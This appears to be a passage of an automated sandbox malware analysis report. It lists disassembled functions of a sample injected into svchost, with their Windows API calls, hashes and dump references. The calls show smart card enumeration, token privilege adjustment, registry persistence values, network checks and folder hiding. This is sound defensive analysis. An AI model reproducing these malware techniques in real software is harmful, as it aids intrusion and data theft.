                                                                                                                                                                                                                • Opcode Fuzzy Hash: c22bfc42e8cd49b5899e496928533ac8fa954609482470bd65f3b5cacdee762a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A01B172A86204ABD720ABF5FC88F9B7B5CEB84B95F014A23F60487100D7369810CBF0
                                                                                                                                                                                                                Function 02BD8AB0 Relevance: 9.1, APIs: 6, Instructions: 108fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02BD8AF4
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02BD9447), ref: 02BD8B0E
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,02BD9447), ref: 02BD8B36
                                                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02BD9447), ref: 02BD8B42
                                                                                                                                                                                                                  • Part of subcall function 02BB7310: GetHandleInformation.KERNEL32(?,00000000), ref: 02BB7324
                                                                                                                                                                                                                  • Part of subcall function 02BB7310: CloseHandle.KERNEL32(?), ref: 02BB7335
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00140B17,00000000,00000000,00140B17,?,02BD9447), ref: 02BD8B6E
                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00140B17,02BD9447,00000000,00140B17), ref: 02BD8BA0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3741995677-0
                                                                                                                                                                                                                • Opcode ID: b008d2694f0508dc64ad7984f9fba0f21e2e7c2b89677274535306005b6bd81a
                                                                                                                                                                                                                • Instruction ID: 04f908a253ad6f4c3636997d0aa294500076e886082e2bd7ef4281fdd2832de8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b008d2694f0508dc64ad7984f9fba0f21e2e7c2b89677274535306005b6bd81a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC316DB2B00609BBD710DF59D881BAAF7B8FF58715F10829AEA0497740E771AD61CBD0
                                                                                                                                                                                                                Function 02BD5850 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02BC6A83,00000000), ref: 02BD5875
                                                                                                                                                                                                                • SCardListReadersA.WINSCARD(02BC6A83,00000000,?,FFFFFFFF), ref: 02BD588C
                                                                                                                                                                                                                • SCardConnectA.WINSCARD(02BC6A83,?,00000002,00000003,?,?), ref: 02BD58BE
                                                                                                                                                                                                                • SCardDisconnect.WINSCARD(?,00000000), ref: 02BD58E9
                                                                                                                                                                                                                • SCardFreeMemory.WINSCARD(02BC6A83,?), ref: 02BD5905
                                                                                                                                                                                                                • SCardReleaseContext.WINSCARD(02BC6A83), ref: 02BD5913
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Card$Context$ConnectDisconnectEstablishFreeListMemoryReadersRelease
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3231658416-0
                                                                                                                                                                                                                • Opcode ID: f640d35ec0cfcd900bb209f6140902435647115b3ac5b12a77ae648c7a5c05a6
                                                                                                                                                                                                                • Instruction ID: 973b43383da6ee514514c617eb5dd37149283a2f07e0575dbc816a0efd9814f0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f640d35ec0cfcd900bb209f6140902435647115b3ac5b12a77ae648c7a5c05a6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E2164B1E40309ABDB30CF95CC48FEEB7B9EF84744F544589E911A7141E771AA04CB60
                                                                                                                                                                                                                Function 02BD59D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: CloseHandle.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$DescriptorToken$CurrentOpenProcessThread$AdjustCloseConvertErrorFreeHandleInfoLastLocalLookupNamedPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 2236266002-820036962
                                                                                                                                                                                                                • Opcode ID: 09d0a1d324d526fb895626fa839b43ab5b48a4af82d8ea1182306967ae069c2f
                                                                                                                                                                                                                • Instruction ID: 16766273108d596bcc35d9cfa1f761a8aaf9491b26b9c222b5324296d89d9aae
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09d0a1d324d526fb895626fa839b43ab5b48a4af82d8ea1182306967ae069c2f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8010C75A40128BBEB24DAA59C84EEFBBBDEF44784B404599BA05D3140E770EA15CBA0
                                                                                                                                                                                                                Function 02BB3830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000101,?,02BB3B17), ref: 02BB3864
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,9e938dd0a,00000000,?,00000000,?), ref: 02BB3885
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 02BB3893
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                • String ID: 9e938dd0a$software\microsoft
                                                                                                                                                                                                                • API String ID: 3677997916-1418632313
                                                                                                                                                                                                                • Opcode ID: 87b5c9d8cef9ae452717c0d4fc2b4666d0c605021700004f1e3171edc234c5bc
                                                                                                                                                                                                                • Instruction ID: e8ca7c269166cf511250656581f828c6c5f1e159dcdc89fe303e5e4156b5c338
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87b5c9d8cef9ae452717c0d4fc2b4666d0c605021700004f1e3171edc234c5bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33F0C9B5A40308FBEB10DBA4CD45BEEBBB8EB04744F504599EA05A7280D7B5A6148B94
                                                                                                                                                                                                                Function 02BD8D50 Relevance: 7.6, APIs: 5, Instructions: 85timeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02BD9234), ref: 02BD8D83
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02BD9234), ref: 02BD8DAB
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02BD9234), ref: 02BD8DD5
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02BD9234), ref: 02BD8DE3
                                                                                                                                                                                                                • FileTimeToDosDateTime.KERNEL32(?,02BD9234,?), ref: 02BD8DF5
                                                                                                                                                                                                                  • Part of subcall function 02BD8890: GetFileType.KERNEL32(?,00000000,00000000), ref: 02BD8899
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 60630809-0
                                                                                                                                                                                                                • Opcode ID: be9dbdc8c09b1c525e3b59087ef78166b30470c028a553adfc4c1c12d086b224
                                                                                                                                                                                                                • Instruction ID: b2eb3b51c220c582e21e1688ca07a54efe578df50d1b77b58d1521a7655ffc22
                                                                                                                                                                                                                • Opcode Fuzzy Hash: be9dbdc8c09b1c525e3b59087ef78166b30470c028a553adfc4c1c12d086b224
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5216FB28007449FC770CFA9D9C09ABFBF8FB48215B400A6EE69AC3A40D771B5558B60
                                                                                                                                                                                                                Function 02BB6DE0 Relevance: 7.6, APIs: 5, Instructions: 81sleepthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6E00
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,75570F10), ref: 02BC4FE7
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,75570F10), ref: 02BC5045
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02BB6E1C
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02BB6E78
                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,75570F10,?,00000000,00000000), ref: 02BB6EA0
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02BB6EB8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2160739018-0
                                                                                                                                                                                                                • Opcode ID: b96785ae455cf112ce9493ca4a84dbad98cb09b84da9f0a6967be98fda9c8718
                                                                                                                                                                                                                • Instruction ID: 487439d21dd10252069fa1b175a6d99ac81accc591ca5244585bfa92dc6b2a99
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b96785ae455cf112ce9493ca4a84dbad98cb09b84da9f0a6967be98fda9c8718
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A21C5B5A802146BEB229B64DC81BFE336EEF44754F4106B4EB19A70C0D7F0ED818B95
                                                                                                                                                                                                                Function 02BC8080 Relevance: 7.6, APIs: 5, Instructions: 68sleepsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFindFileNameA.SHLWAPI(?), ref: 02BC80CA
                                                                                                                                                                                                                • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02BC8108
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02BC8123
                                                                                                                                                                                                                • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02BC812A
                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02BC8151
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 433761119-0
                                                                                                                                                                                                                • Opcode ID: 2bbb1bb03d4f651f083ed3f93a5b58ab86b01d87fdf0024a010e3d911c1c3d16
                                                                                                                                                                                                                • Instruction ID: 8094b1f83d3529d8b7155c92eda68eccee411e29fabd78396c05c2adb715f5d1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bbb1bb03d4f651f083ed3f93a5b58ab86b01d87fdf0024a010e3d911c1c3d16
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19210A31840219DBDB2287689C44BEA77E8EF19354F244AE8DA5597380DBB09A84CFE1
                                                                                                                                                                                                                Function 02BD8C10 Relevance: 7.6, APIs: 5, Instructions: 64fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02BD98B8,00000000,00000000,75572F00,?,02BC3CFD,00000000,00000000,00000000,00000000,?), ref: 02BD8C37
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02BD98B8,00000000,00000000,75572F00,?,02BC3CFD,00000000,00000000,00000000,00000000), ref: 02BD8C57
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,02BD98B8,00000000,00000000,75572F00,?,02BC3CFD,00000000,00000000,00000000,00000000), ref: 02BD8C68
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02BD98B8,00000000,00000000,75572F00,?,02BC3CFD,00000000,00000000,00000000,00000000), ref: 02BD8C81
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,02BD98B8,00000000,00000000,75572F00,?,02BC3CFD,00000000,00000000,00000000,00000000), ref: 02BD8C92
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02BD96E6
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: HeapValidate.KERNEL32(00000000), ref: 02BD96ED
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: GetProcessHeap.KERNEL32(00000000,?), ref: 02BD96FA
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: HeapFree.KERNEL32(00000000), ref: 02BD9701
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02BD9710
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: HeapValidate.KERNEL32(00000000), ref: 02BD9713
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: GetProcessHeap.KERNEL32(00000000,?), ref: 02BD9720
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: HeapFree.KERNEL32(00000000), ref: 02BD9723
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$HandleProcess$CloseFreeInformationValidate$FileUnmapView
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3732962355-0
                                                                                                                                                                                                                • Opcode ID: 8ccf0b03b61ead581df9834576579352a1befe81ec2b38ca18ba83742a1d8540
                                                                                                                                                                                                                • Instruction ID: 572d477064171e1b390230e7ffc231ed0deae112278a7ac4e3692614d00eedff
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ccf0b03b61ead581df9834576579352a1befe81ec2b38ca18ba83742a1d8540
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8811B170503304DFD7308F69DA487AAFBE8EF44646F6809ADE989D3240F7709902C750
                                                                                                                                                                                                                Function 02BC80A6 Relevance: 7.6, APIs: 5, Instructions: 54sleepsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFindFileNameA.SHLWAPI(?), ref: 02BC80CA
                                                                                                                                                                                                                • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02BC8108
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02BC8123
                                                                                                                                                                                                                • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02BC812A
                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02BC8151
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 433761119-0
                                                                                                                                                                                                                • Opcode ID: 587444ce1d92baeec4d7deecd34b9c22084bc780c3dbcc1a934e689eb32c365d
                                                                                                                                                                                                                • Instruction ID: b91d95f2af756ed5e137f77ae37f493e5f51fb55d282d4a2a4e42d478f11cc7b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 587444ce1d92baeec4d7deecd34b9c22084bc780c3dbcc1a934e689eb32c365d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26115431940219DBDB22CB64DC44BED77E8EF59344F244AE8D955A7380DBB09A84CFA1
                                                                                                                                                                                                                Function 02BB6A90 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB6AB4
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: memset.MSVCRT ref: 02BB69A2
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: memset.MSVCRT ref: 02BB69C0
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: lstrcpynA.KERNEL32(?,?,00000104), ref: 02BB69DD
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02BB6A4D
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: RegSetValueExA.ADVAPI32(?,9E9388F8a,00000000,00000001,?,00000104), ref: 02BB6A6F
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: RegCloseKey.ADVAPI32(?), ref: 02BB6A7D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB6AE4
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB6AE7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB6AF4
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000), ref: 02BB6AF7
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: memset.MSVCRT ref: 02BB66B0
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB670F
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB671F
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6729
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB6734
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB674F
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB675C
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6766
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB6771
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6794
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: calloc$Heapexit$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1728208919-0
                                                                                                                                                                                                                • Opcode ID: f71a3be06a67fa125f155c6a7d29025f0917bae97500b2132144957fc0733210
                                                                                                                                                                                                                • Instruction ID: 31d5e7ea1fad52ad0a1536c7053e0580023c254ace0d025ea0873b036627e372
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f71a3be06a67fa125f155c6a7d29025f0917bae97500b2132144957fc0733210
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EF0F63198122967DA316AB5EC08FEB7B5CEF81BA2F018521F605D3080C7F5D850CBE0
                                                                                                                                                                                                                Function 02BB7980 Relevance: 7.5, APIs: 5, Instructions: 20COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,02BC8E9D,?,?,?,?,?,?), ref: 02BB7987
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB7992
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB799A
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BB79A5
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB79AC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
